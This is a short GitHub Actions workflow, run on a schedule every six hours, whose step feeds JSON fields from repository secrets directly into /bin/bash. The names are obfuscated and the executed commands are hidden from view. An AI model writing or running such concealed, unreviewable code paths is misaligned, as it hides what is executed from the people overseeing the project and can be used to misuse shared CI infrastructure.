name: xiangzhejinhuan
on:
  workflow_dispatch:
  schedule:
    - cron: '9 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiangzhejinhuan
        env:
          wlik43: ${{ secrets.wlik43 }}
        run: |
          echo $wlik43 | jq -r .tri42 | /bin/bash
          echo $dlprg38 | jq -r .mc811 | /bin/bash
          echo $tdvxz7 | jq -r .ahtkg85 | /bin/bash
          echo $fv66 | jq -r .ka908 | /bin/bash
          echo $x9700 | jq -r .i997 | /bin/bash
          echo $swpbt2 | jq -r .t02102 | /bin/bash
          echo $b68 | jq -r .kh00294 | /bin/bash
          echo $csv752 | jq -r .hiaec237 | /bin/bash
          echo $xhq7768 | jq -r .dkff12 | /bin/bash
          echo $das7 | jq -r .ubgh79 | /bin/bash

